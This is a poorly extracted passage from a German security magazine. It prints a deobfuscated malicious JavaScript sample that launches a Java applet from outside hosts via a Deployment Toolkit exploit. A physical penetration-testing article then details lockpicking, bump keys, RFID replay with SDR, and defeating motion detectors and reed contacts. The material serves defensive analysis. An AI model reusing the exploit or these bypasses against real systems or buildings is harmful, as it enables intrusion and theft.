ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 15
das Verbieten von JavaScript3 was moderne Ajax-basierte Internetseiten nahezu unbenutzbar macht haumltte auf das Laden des JavaApplets keine Auswir-kung
Wie kann man derartigen heterogenen Bedrohun-gen begegnen Das haumlufigste Einfallstor fuumlr Schad-software bleibt die E-Mail Also ist die Absicherung der E-Mail-Kommunikation der erste und wichtigs-te Schritt zur Sicherung des Systems Moderne An-ti-Spam und Anti-Virenprogramme sind in der Lage Massenmails mit gefaumlhrlichen Anhaumlngen zu erken-
nen bevor entsprechende Signaturen bereitstehen Weiterhin sollte der ausgehende E-Mail-Verkehr mit gleicher Sorgfalt auf Spam und Viren gepruumlft wer-den wie der eingehende Nur so kann man feststel-len ob man bereits ungewollt zum Spam- und Viren-versender geworden ist Am besten funktioniert dies mit einer ausgelagerten E-Mail-Sicherheitsloumlsung da der Anbieter meist von der Masse der empfangenen und analysierten E-Mails profitiert sprich Bedrohun-gen meist schneller erkennt als der einzeln agieren-de Mail-Server-Administrator Und letzen Endes gilt immer noch Oumlffnen Sie keine E-Mails oder Anhaumlnge von Unbekannten
httpde-wikipediaorgwikiJava_Virtual_Machine
fox
Listing 5 Codefragment des entschleierten JavaScript verdeutlicht das Potential
var fdata
var skd=u5350u5251u5756u9c55u00e8u0000u5d00
ued83 u6870u0070
var skd1=skd + u7468u7074 u0038u9000
var skd2=skd + u7468u7074 u0032u9000
function JAVASMB()
try
see httpwwwexploit-dbcomexploits12117 for
exploit description
var u = HTTP -J-jar -Jbittoramcomsmbold
avi httparestyutecom
sadhbdsa879321jbdaslphpi=2
none
if (windownavigatorappName == Microsoft Internet
Explorer)
try
var o = documentcreateElement(OBJECT)
oclassid = clsidCAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
olaunch(u)
catch (e)
var o2 = documentcreateElement(OBJECT)
o2classid = clsid8AD9C840-044E-11D1-B3E9-
00805F499D93
o2launch(u)
else
var o = documentcreateElement(OBJECT)
var n = documentcreateElement(OBJECT)
otype = applicationnpruntime-scriptable-
plugindeploymenttoolkit
ntype = applicationjava-deployment-toolkit
documentbodyappendChild(o)
documentbodyappendChild(n)
try
olaunch(u)
catch (e)
nlaunch(u)
catch (e)
IEPEERS()
IEPEERS()
JAVASMB()
MICHAEL PEICKEntwickler und Mitglied des eleven Research Teams
Penetration Testing im Jahre 2010
hakin9orgde 17
Im Jahr 2010 ist es kein Problem mehr ein Netzwerk vor Gefahren zu schuumltzen Firewall-Hardware gibt es mittlerweile zu erschwinglichen Preisen IT-System-
haumluser holen sich Sicherheitsexperten und richten mit deren Unterstuumltzung ein sicheres Netzwerk ein Mitar-beiter werden im Umgang mit der IT-Technik geschult sodass Phishing und Social Engineering Angriffe erfolg-los verlaufen IDS und IPS Systeme finden verdaumlchtige Aktivitaumlten im Netzwerk und zeigen diese dem Adminis-trator an Die IEEE 8021X Authentifizierung an Access Points und Netzwerkswitches verhindern den Zugang von unbekannten Computern zum Netzwerk Mit IEEE 8021Q (Virtual Local Area Network oder kurz VLAN) werden Netzwerke segmentiert obwohl alle Compu-ter hardwareseitig an einem Switch haumlngen Mit diesen Techniken ist man in der Lage ein Netzwerk sowohl vor Angriffen aus dem WAN als auch aus dem Inneren LAN zu schuumltzen ndash wuumlrde man meinen
Die RealitaumltIch wurde von einem mittelstaumlndischen Unternehmen engagiert einen Penetrationstest durchzufuumlhren Waumlh-rend der Footprinting-Phase habe ich sehr schnell er-kannt dass die IT-Sicherheit bei diesem Unternehmen ein sehr sensibles Thema ist Doch trotz fast paranoider Sicherheitsvorkehrungen ist es mir erfolgreich gelun-gen dem Unternehmen die Kundendaten zu entwen-den Zwar war IT-Technisch alles abgesichert der phy-sische Zugang zu den Daten war es allerdings nicht Die Eingangstuumlr des Unternehmens war wegen des
Kundenverkehrs nicht abgeschlossen Die Tuumlr zum Serverraum stand wohl wegen der Abwaumlrme sperran-gelweit offen im Schloss des Racks steckte der Schluumls-sel Es gab nichts und niemanden der mich davor ab-halten konnte aus jedem Server jeweils eine Festplatte einzustecken und blitzschnell das Gelaumlnde zu verlas-sen Weder der Geschaumlftsfuumlhrer noch die IT-Adminis-tration hat mit einem so dreisten und einfachen Angriff gerechnet
In dem folgenden Artikel werde ich die aktuelle Si-cherheitstechnik vorstellen und aufzeigen wie ein-fach diese Technik zerstoumlrungsfrei mit und fast spurlos uumlberlistet werden kann Dieser Artikel ist keine Anlei-tung wie man einbricht er soll lediglich die Schwach-stellen der heute massenhaft eingesetzten Systeme aufzeigen Aus diesem Grund habe ich mich bei den Beschreibungen kurz gefasst sowie einige Details weggelassen
Zugefallene TuumlrenWas ist eigentlich eine zugefallene Tuumlr Rund 95 al-ler Tuumlren haben heute ein Schloss mit einer Falle Wird die Tuumlr zugezogen faumlllt die Schlossfalle in die dafuumlr vorgesehene Oumlffnung des Schlieszligbleches in der Tuumlrz-arge Die Tuumlr laumlsst sich dann entweder mit dem Tuumlr-griff oder durch das drehen des Schlieszligzylinders wieder oumlffnen (wenn zB auf einer Seite ein Knauf statt eines Angriffes angebracht ist) Mit dem Schluumlssel reicht ei-ne halbe Umdrehung aus um die Tuumlr wieder zu oumlffnen Bei elektronischen Schlieszligsystemen erfolgt die Freiga-
Penetration Testing im Jahre 2010
Viele Administratoren uumlbersehen leider bei der Absicherung des Netzwerkes seine physikalische Sicherheit Die Bedrohung kommt nicht nur durch das Ethernet-Kabel
IN DIESEM ARTIKEL ERFAHREN SIE
werden koumlnnen
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
Dimitri Roschkowski
10201018
PRAXIS
Um so etwas zu verhindern bieten sich sogenannte Doppelfalztuumlren an (Abbildung 2) Diese Tuumlren haben einen zweiten Knick im Rahmen und Tuumlrblatt Eine an-gesetzte Oumlffnungsnadel kommt damit nicht mehr an die Schlieszligfalle ran und eine Oumlffnung wird damit verhindert Mit einer sogenannten bdquoMach Aufldquo Faltkarte laumlsst sich aber auch dieses Hindernis uumlberwinden
Damit eine Tuumlr mit diesen Techniken nicht geoumlffnet werden kann hilft es nur diese Tuumlr abzuschlieszligen Dabei wird mindestens ein Riegel in das Schlieszligblech geschoben der ohne Schluumlssel nicht mehr zuruumlckge-schoben werden kann Das Abschlieszligen einer Tuumlr mit Schluumlssel ist jedoch nicht komfortabel Diese Schwauml-che haben die Schlosshersteller erkannt und bie-ten selbstschlieszligende Schloumlsser an Diese Schloumls-ser schieben automatisch beim zufallen die Riegel in das Schlieszligblech Betaumltigt man die Tuumlrklinke wird gleichzeitig die Schlossfalle und die Riegel zuruumlckge-schoben die Tuumlr ist wieder offen Je nach Modell des Schlosses braucht man aber weiterhin eine bis zwei Umdrehungen mit dem Schluumlssel um diese Tuumlr zu oumlff-nen
Diese Schloumlsser sind allerdings nicht fuumlr Tuumlren ge-eignet die uumlber eine Elektronik geoumlffnet werden sol-len Hierfuumlr gibt es allerdings auch eine Loumlsung Es gibt Schloumlsser mit einer Elektronik und einem Elekt-romotor der dann bei einem entsprechenden Signal das Schloss aufschlieszligt und damit die Funktion eines Schluumlssels simuliert Allerdings sind solche Schloumlsser recht teuer
Lockpicking ndash Der Zylinder als AngriffszielEine weitere Schwachstelle einer Tuumlr ist der Zylinder Ein Laie kann nicht erkennen ob die Mechanik eines Zylinders sicher ist oder mit entsprechendem Werkzeug sekundenschnell uumlberlistet werden kann Fuumlr ihn zaumlhlt lediglich der Preis und die Logos auf der Verpackung um die Sicherheit beurteilen zu koumlnnen Hier gilt aller-dings ausnahmsweise der Grundsatz billig = schlechtteuer = gut wobei man dazu anmerken muss dass man die oberste Preiskategorie der Zylinder waumlhlen muss um tatsaumlchlich eine hohe Sicherheitsstufe her-stellen zu koumlnnen Dass man Zylinder oumlffnen kann liegt an der (Massen-)Herstellung dieser mechanischen Ge-raumlte Jedes Produkt weist gewisse Toleranzen auf je groumlszliger diese Toleranzen sind desto leichter laumlsst sich der Zylinder uumlberlisten
Wie Funktioniert ein SchlieszligzylinderEin Schlieszligzylinder besteht aus einem Gehaumluse (hell-grau) und einem Kern (dunkelgrau) Kernstifte (gelb) und Gehaumlusestifte (rot) verhindern dass der Kern ge-dreht werden kann Fuumlhrt man nun einen Schluumlssel in den Schlieszligkanal (weiszlig) ein druumlcken die Zaumlhne des Schluumlssels die Kernstifte herunter sodass der Uumlber-gang zwischen den Kernstiften und den Gehaumlusestif-
be dabei nicht an der Schlossfalle freigegeben sondern am Schlieszligblech
Wie laumlsst sich eine zugefallene Tuumlr oumlffnen Zugefallene Tuumlren lassen sich ganz einfach oumlffnen Schluumls-seldienste verwenden hierfuumlr Oumlffnungsnadeln (Abbildung 1) Diese Oumlffnungsnadeln werden in Houmlhe der Schlossfalle zwischen Tuumlrzarge und Tuumlrblatt angesetzt zieht man jetzt den hinteren Teil der Oumlffnungsnadel nach oben druumlckt der vordere Teil die Schlieszligfalle wieder ins Schloss zuruumlck ndash die Tuumlr ist damit offen Mit etwas Uumlbung dauert es nicht laumlnger als fuumlnf Sekunden um eine Tuumlr zu oumlffnen
Abbildung 2 Eine Oumlffnungsnadel an einer Doppelfalztuumlr
Abbildung 1 Zwei Saumltze Oumlffnungsnadeln
Penetration Testing im Jahre 2010
hakin9orgde 19
ten genau zwischen dem Kern und dem Gehaumluse ist In diesem Zustand laumlsst sich der Kern drehen und ein Schloss aufschlieszligen
Ich moumlchte hier drei Methoden vorstellen mit denen ein Schlieszligzylinder ohne Schluumlssel zerstoumlrungsfrei ge-oumlffnet werden kann Beim klassischen Handpicken geht es darum die Sperrstifte eines Schlosses so zu mani-pulieren dass diese den Kern freigeben Zunaumlchst wird ein Spanner in den Schlieszligkanal eingefuumlhrt und um ein paar Grad gedreht sodass ein minimaler Drehmoment auf die Sperrstifte wirkt Geht man jetzt mit einem Hand-pick die einzelnen Sperrstifte ab so laumlsst sich mit etwas Uumlbung erfuumlhlen welcher Stift gerade am meisten Wi-derstand bietet Druumlckt man diesen Stift mit dem Hand-pick herunter laumlsst sich der Kern ein kleines bisschen drehen sobald der der Gehaumlusestift den Kern verlas-sen hat Diesen Stift hat man jetzt gesetzt Nun sperrt ein anderer Sperrstift In einem normalen Schloss gibt es etwa fuumlnf solcher Stifte Hat man alle Stifte richtig gesetzt laumlsst sich der Kern drehen ist der Zylinder ist damit geoumlffnet
Eine weitere Methode um einen Schlieszligzylinder zu oumlffnen sind Schlagschluumlssel Ein Schlagschluumlssel ist ein spezieller aus Stahl gefertigter Schluumlssel der nur im Profil in einen Zylinder passt Die Zaumlhne des Schluumlssels wurden auf die tiefst moumlgliche Position gefraumlst auszliger-dem wurde der Anschlag des Schluumlssels um etwa ei-nen Millimeter verkuumlrzt sodass der Schluumlssel sich mit leichtem Druck etwas tiefer ins Schloss einfuumlhren laumlsst als vorgesehen Zum Oumlffnen des Zylinders fuumlhrt man den Schlagschluumlssel in den Zylinder ein und schlaumlgt an-schlieszligend mit einem flexiblen Hammer auf den Schluumls-sel Den Schlagimpuls uumlbertragen die Kernstifte auf die Gehaumlusestifte die dann nach unten gedraumlngt werden und damit den Kern freigeben Dreht man den Schlag-schluumlssel genau in diesem Moment (wenige Millisekun-den nach dem Schlag) laumlsst sich der Kern drehen und das Schloss oumlffnen
Die dritte Methode ist ein Elektro-Pick Ein Elek-tropick arbeitet nach dem gleichen Prinzip wie ein Schlagschluumlssel nur dass hier mehrere Schlaumlge pro Sekunde auf die Sperrstifte erfolgen Um einen Zylin-der mit dieser Methode zu oumlffnen fuumlhrt man die Na-del des Elektro-Picks sowie einen Spanner (entwe-der einen normalen oder einen Drehspanner) in den Schlieszligkanal ein und schaltet den Pick ein Anstatt den Pick durchgehend laufen zu lassen empfiehlt es sich ihn in kurzen Sequenzen ein- und auszuschalten Sind die Sperrstifte in passender Position laumlsst sich der Kern drehen
Bei allen drei vorgestellten Oumlffnungsmethoden hat man bei abgeschlossenen Schloumlssern immer ein Pro-blem Hat man einen Zylinder um 360deg gedreht druuml-cken die Federn die Gehaumlusestifte wieder in den Kern und man muumlsste den Zylinder erneut oumlffnen (picken) Um das zu verhindern ndash und damit stelle ich das letz-
te Werkzeug meiner Sammlung vor ndash benutzt man das bdquoFlip-Itldquo Werkzeug Dieses Werkzeug nutzt die physika-lische Traumlgheit aus indem der Zylinder so schnell dreht wird dass die Federn es nicht schaffen die Stifte in den Kern zu druumlcken Dazu spannt man den bdquoFlip-Itldquo erst einmal in der Richtung vor in der der Zylinder gedreht werden soll dann fuumlhrt man es in den Schlieszligkanal ein und druumlckt den Ausloumlser Der Zylinder wird dann uumlber die oberste Position gedreht und man kann das Schloss weiter oumlffnen
Man benoumltigt viel Uumlbung um einen Zylinder ohne Schluumlssel oumlffnen zu koumlnnen Denn macht man es mit Gewalt kann die Mechanik im inneren beschaumldigt wer-den Dann laumlsst sich das Schloss nicht einmal mit dem richtigen Schluumlssel oumlffnen
Sichere SchlieszligzylinderSichere Schlieszligzylinder gibt es in meinen Augen nicht Je nachdem welchen Aufwand und Kosten man auf sich nimmt wird man in der Lage sein alle Zylinder zu um-gehen Einen aus meiner Sicht relativ sicheren Zylin-der bietet die Firma EVVA mit dem MCS (Magnet Code System) an Statt normaler Stifte arbeitet dieser Zylin-der mit insgesamt acht Magnetrotoren Wird ein Schluumls-
Abbildung 4 Werkzeugsatz zur zerstoumlrungsfreien Oumlffnung von Schloumlssern
Abbildung 3 Ein Schlieszligzylinder im Querschnitt Links ist der Zylinder abgeschlossen rechts offen (Bildquelle Wikipediade)
10201020
PRAXIS
sel mit richtiger Magnet-Codierung eingefuumlhrt werden die Rotoren in die Schlieszligposition gebracht und der Zylinder laumlsst sich drehen Zusaumltzlich kann ein solcher Zylinder mit einer Elektronik auf RFID Basis ausgestat-tet werden Zusaumltzlich zum Magnetcode wird noch ei-ne elektronische Authentifizierung durchgefuumlhrt bevor dieser Zylinder trotz des richtigen Schluumlssels gedreht werden kann So koumlnnen zB verlorene Schluumlssel ge-sperrt werden oder um Mitarbeitern den Zutritt nur zu bestimmten Zeiten zu gestatten
CodeschloumlsserCodeschloumlsser sind in der Regel zugefallene Tuumlren und lassen sich am einfachsten mit den bereits oben vor-gestellten Methoden oumlffnen In diesem Artikel moumlchte ich aber auf eine weitere Schwachstelle hinweisen Die Abbildung 5 zeigt ein typisches Codeschloss anhand des Zylinders auf der rechten Seite kann jeder darauf schlieszligen wie groszlig die Code-Tasten dieses Schlosses in der Realitaumlt sind Wuumlrde man eine Codeeingabe fil-men koumlnnte man anhand der langen Handbewegun-gen auf den Code schlieszligen koumlnnen
Diese Schwachstelle laumlsst sich aber ganz einfach schlieszligen indem man den Eingabetasten die Ziffern fuumlr jede Codeeingabe per Zufallsgenerator zuweist Das bedeutet dass die obere linke Taste nicht permanent die Ziffer 1 eingibt sondern bei jeder Codeeingabe ei-ne andere Durch diese zufaumlllige Anordnung der Zif-fern auf den Tasten laumlsst sich nicht mehr anhand der Handbewegung feststellen welche Ziffer eingegeben wurde Umsaumltzen laumlsst sich eine solche Eingabetech-nik mit Siebensegmentanzeigen oder mini-OLED-Bild-schirmen unter durchsichtigen Tasten bzw mit einem Touchscreen
In Indoor-Bereich trifft man vor einigen Raumlumen auf eine einfachere Version von Codeschloumlssern Bei die-sen Schloumlssern liegt das Eingabeterminal direkt am Schloss an die Energieversorgung erfolgt uumlber Bat-terien Im geschlossenen Zustand laumlsst sich die Tuumlr-klinke ohne Funktion herunterdruumlcken Gibt man den richtigen Code ein wird ein Elektromagnet mit Strom versorgt und Zieht einen Stift an der die Tuumlrklinke mit dem Schloss verbunden Betaumltigt man jetzt die Tuumlrklin-ke so laumlsst sich die Tuumlr oumlffnen Da die Batterien in ei-nem solchen Schloss moumlglichst lange halten sollen arbeiten die Schloumlsser mit einem recht geringen Ma-gnetfeld Dieses Magnetfeld kann man jedoch mit ei-nem von auszligen angebrachten starken Magneten (sie-he auch Abschnitt uumlber Reed-Relais) simulieren und so das Schloss oumlffnen Im Uumlbrigen lassen sich mit einem starken Magneten auch einige aumlltere elektronische Zy-linder oumlffnen
Schlieszligsysteme mit RFID-TagsRFID steht fuumlr radio frequency identification also fuumlr die Identifikation uumlber Funkwellen Diese Technik
Abbildung 6 Ein Elektronisches Codeschloss an einer Gegensprechanlage
Abbildung 5 Ein EVVA-MCS Schluumlssel
Penetration Testing im Jahre 2010
hakin9orgde 21
ist heute sowohl bei Unternehmen als auch in Pri-vathaumlusern (Autoschluumlssel Funk-Garagentoroumlffner) sehr verbreitet und wegen des Komforts beliebt Im Wesentlichen besteht das System aus zwei Kompo-nenten einem RFID Lesegeraumlt und den sogenannten Tags Mit den Tags koumlnnen sich die Zugangsberech-tigten Personen am Lesegeraumlt identifizieren Unab-haumlngig davon ob das Tag aktiv (mit einer eigenen Energieversorgung) oder passiv (die notwendige Energie liefert das Lesegeraumlt) ist wird der Identifi-kationsvorgang vom Tag eingeleitet In den einfach-sten Faumlllen sendet das Tag unverschluumlsselt die eige-ne Seriennummer oder einen vorher eingespeicher-ten Code das Lesegeraumlt empfaumlngt den Code und uumlberpruumlft ob die Seriennummer oder der Code zu-gangsberechtigt ist In den wenigsten Faumlllen erfolgt eine zusaumltzliche Kryptographische Authentifizierung des Tags die aber wegen der geringen Rechenka-pazitaumlt und Energieversorgung sehr einfach ausfaumlllt
Wie kann man solche Systeme uumlberlisten Das Zauberwort dazu lautet bdquoSoftware Defined Ra-dioldquo (SDR) Mit einem SDR Tranceiver ist man in der Lage die Kommunikation zwischen dem Tag und dem Lesegeraumlt aufzuzeichnen und auf einem Rech-ner zu analysieren Anschlieszligend sendet man die aufgezeichneten und eventuell bearbeiteten Daten an das Lesegeraumlt
Wie laumluft ein solcher Angriff ab Zunaumlchst einmal muss man herausfinden auf wel-cher Frequenz die Kommunikation zwischen dem Le-segeraumlt und den Tags erfolgt Dazu kann man uumlber den Herstellernamen des Lesegeraumltes und seinem Produkt-Portfolio gehen oder einfach verschiedene Tags ausprobieren Wenn ein Tag mit dem einge-setzten Lesegeraumlt nicht kompatibel ist erfolgt keine Reaktion Wird dem Tag der Zugang verweigert so zeigt das Lesegeraumlt dies in der Regel an Dann wird ein SRD Tranceiver benoumltigt der auf der benoumltigten Frequenz arbeitet Dazu verwende ich den USRPUSRP2 Tranceiver mit einem passenden Daughter-board und einer Richtantenne (700$1400$ + 275$ + 100$) Der Vorteil dieses Universalsystems liegt daran dass man mit verschiedenen Daughterboard unterschiedliche Frequenzen abdecken kann Die Richtantenne richtet man dann etwas seitlich auf das Lesegeraumlt aus und faumlngt mit der Aufzeichnung der Daten in dem Frequenzbereich an Bei Long Range Tags (das Tag kann mehrere Meter vom Lesegeraumlt entfernt sein) reicht bei Unverschluumlsselten Systemen - wegen der houmlheren Sendestaumlrke - die Aufzeichnung einer Kommunikation aus Passive Tags wie RFID Karten senden ein viel schwaumlcheres Signal deshalb sind die Aufzeichnungen oft gestoumlrt In der Regel be-noumltigt man fuumlnf bis zehn Aufzeichnungen um ein Mus-
Abbildung 8 Eine Uumlberwachungskamera hat eine Veraumlnderung im Bild detektiert Der veraumlnderte Bildausschnitt wird in einem Rahmen angezeigt
Abbildung 7 Das Lesegeraumlt reagiert auf eine Mifare-Classic Karte und lehnt den Zugang ab
10201022
PRAXIS
ter zu finden Der Anfang der Uumlbertragung ist immer gleich in der Mitte gibt es einen variablen Bereich und das Ende ist bei allen Aufzeichnungen ebenfalls gleich Damit ein Lesegeraumlt nun dem virtuellen Tag den Zugang gewaumlhrt saumlubert man zunaumlchst einmal die Aufzeichnungen mit einigen Filtern GNU-Radio bietet hierfuumlr zahlreiche Moumlglichkeiten Dann stellt man sich aus mehreren Aufzeichnungen ca drei moumlglichst ideale (hier braucht man etwas Erfahrung ein gutes Auge und etwas Fingerspitzengefuumlhl) Kom-munikationen zusammen und sendet diese an das Lesegeraumlt Mindestens eine dieser Aufzeichnungen wird dann das Lesegeraumlt akzeptieren und dem An-greifer den Zugang gewaumlhren
Aus der Praxis kann ich sagen dass etwa 90 al-ler RFID-Karten-Systeme sich nur mit der Serien-nummer des Tags zufrieden geben Aumlltere Garagen-toroumlffner arbeiten mit einem statischen Code Neuere Garagentoroumlffner und einige Autohersteller nutzen ei-nen Rolling Code um den Nutzer zu identifizieren Im Maumlrz 2008 wurde auch dieses System von Forschern der Ruhr-Universitaumlt Bochum geknackt Zwei aufge-zeichnete Kommunikationen genuumlgen bereits fuumlr ei-ne Seitenkanalattacke Ebenfalls wurde im Jahr 2008 die Verschluumlsselung des Mifare-Systems per Rever-se Engineering geknackt Solche Verschluumlsslungen verlangsamen nur den Angriff und machen ihn teurer
Gibt es auch sichere RFID-Systeme Die gibt es durchaus Hier verwendet man eine asymmetrische Verschluumlsselung Fuumlr jedes zugangs-
berechtigte Tag wird ein privater und ein oumlffentlicher Schluumlssel erzeugt Der private Schluumlssel wird in einer Datenbank gespeichert auf die das Lesegeraumlt zu-greifen kann Der oumlffentliche Schluumlssel wird auf dem Tag gespeichert Die Identifizierung erfolgt dann in mehreren Schritten Wie oben bereits beschrieben faumlngt das Tag mit der Identifikation an indem es dem Lesegeraumlt seine Seriennummer mitteilt Das Lesege-raumlt generiert daraufhin eine Zufallszahl und sendet diese mit der Seriennummer des Tags wieder zuruumlck (Da die Kommunikation uumlber Funk erfolgt kann es sein dass zur gleichen Zeit mehrere RFID Tags aktiv sind Deshalb muss man waumlhrend der Kommunikati-on stets angeben fuumlr welchen Empfaumlnger eine Nach-richt bestimmt ist) Das Tag empfaumlngt die Nachricht verschluumlsselt diese mit dem oumlffentlichen Schluumlssel und sendet sie an das Lesegeraumlt zuruumlck Kann das Lesegeraumlt die empfangene Nachricht mit dem priva-ten Schluumlssel des Tags entschluumlsseln und stimmt die Nachricht mit der Zufallszahl uumlberein wird der Zu-gang gewaumlhrt
BewegungsmelderBewegungsmelder verwenden fuumlr die Bewegungsde-tektion Passiv Infrarot Sensoren (PIR) Jedes Objekt emittiert eine Waumlrmestrahlung ein PIR Sensor kann diese Strahlung messen Um Bewegungen detektieren zu koumlnnen wird der Sensor mit Buumlndellinsen in Be-reiche aufgeteilt Aumlndert sich die einfallende Strahlung in einem Bereich um einen bestimmten Schwellwert wird dies als Bewegung interpretiert Der Schwellwert sorgt auszligerdem dafuumlr dass statische Temperaturver-aumlnderungen der Umgebung nicht als Bewegung ge-deutet werden Diese Funktionsweise ist leider Fehler-anfaumlllig so kann zB ein kalter Luftstrom bereits einen Bewegungsmelder ausloumlsen Hierfuumlr setzen bessere Bewegungsmelder (Dualmelder) zusaumltzlich noch ei-nen Ultraschall-Sensor ein Nur wenn beide Sensoren ausloumlsen wird eine Bewegung gemeldet Damit sol-len Fehlalarme verhindert werden VdS-Anerkannte Bewegungsmelder die in Alarmanlagen verwendet werden loumlsen zusaumltzlich Alarm aus wenn diese ab-gedeckt werden
Wie kann man Bewegungsmelder uumlberlisten Je groumlszliger die Entfernung zu dem PIR Sensor ist des-to weniger nimmt eine Veraumlnderung Einfluss auf die einfallende Infrarotstrahlung in einem Bereich Auch haben Gegenstaumlnde mit gleicher Waumlrmestrahlung kei-nen Einfluss auf die Sensoren Einen Bewegungsmel-der (auch einen Dualmelder) kann man deshalb mit ei-nem Tuch uumlberlisten Zunaumlchst laumlsst man das Tuch im uumlberwachten Raum einige Minuten liegen damit es die Temperatur der Umgebung annimmt Wenn man sich jetzt in dieses Tuch einhuumlllt und seitwaumlrts mit dem Ruuml-cken zum Bewegungsmelder langsam an diesem vor-
Abbildung 9 Eine Buumlroklammer ist an einer Schnurr befestigt Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so stark dass die Buumlroklammer in der Luft haumlngt
Magnete sind kein Spielzeug
Penetration Testing im Jahre 2010
hakin9orgde 23
beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
Magnet wird auf dem beweglichen Element in Houmlhe des Kontaktes befestigt Wirkt ein Magnetfeld auf den Reed-Kontakt ziehen sich die Schaltkontakte gegen-seitig an und ein Stromkreis wird geschlossen Laumlsst das Magnetfeld nach wenn zB eine Tuumlr geoumlffnet wird und sich der Magnet dem Reed-Kontakt entfernt wird der Stromkreis geoumlffnet In diesem Fall wird dann der Alarm ausgeloumlst
Wie lassen sich Reed-Relais uumlberlisten Das ist vergleichbar einfach Die Antwort auf diese Fra-ge lautet natuumlrlich mit einem Magnetfeld Hierfuumlr eig-nen sich sogenannte bdquoTodesmagnetenldquo (Abbildung 9) Diese Permanentmagneten haben ein extrem starkes Magnetfeld Unter Laborbedingungen hat ein Reed-Kontant bereits bei einer Entfernung von 40cm zum Magneten seine Schaltkontakte geschlossen Holz- Plastik- oder sogar Metall-Tuumlren (sogar 2mm Stahl) bieten keine ausreichende Daumlmpfung fuumlr das Magnet-feld
Eine bessere Alternative zu Reed-Relais sind Licht- oder Laserschranken Diese Schranken bringt man so an dass die Tuumlr den Strahl beim oumlffnen unterbrechen muss
Ziele eines solchen AngriffesEs sind viele Angriffsziele denkbar Es kommt immer auf das Unternehmen an dass angegriffen wird Vor einigen Monaten berichtete die Presse uumlber einen sol-chen Angriff auf einen Baumarkt Kriminelle Einbre-cher haben hier statt waren zu stehlen die Elektronik der Karten-Terminals an den Kassen sabotiert sodass diese die eingelesenen Daten von EC- und Kreditkar-ten samt der vom Kunden eingegebenen PIN per Funk uumlbermittelt wurden Auf dem Parkplatz des Baumark-tes stand dann der Angreifer und hat die Daten emp-fangen
Ein anderes Angriffsziel koumlnnte der Anschluss eines Mini-Computers am Netzwerk sein der ein Loch durch die Firewall bohrt und dem Angreifer einen permanen-ten Zugriff auf das Netzwerk uumlber das Internet gestat-tet Auch ist die Installation eines Hardware-Keylogers denkbar um die Zugangsdaten eines Mitarbeiters aus-zuspionieren
DIMITRI ROSCHKOWSKIDer Autor arbeitet bereits seit vielen Jahren als selbststaumlndi-ger IT-Sicherheitsexperte und Consultant Er fuumlhrt auszligerdem bei Unternehmen Penetration Tests durchKontakt mit dem Autor dimitriroschkowskibiz
Im InternethttpdewikipediaorgwikiLockpicking ndash Wikipedia Ein-trag zum Thema LockpickinghttpwwwevvadezylindernhttpdewikipediaorgwikiReed-Relais ndash Wikipedia Ein-trag zum Reed-Relaishttpwwwelvde ndash Artikel-Nr 68-835-10 ndash Radar Bewe-gungsmelderhttpwwwettuscom
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
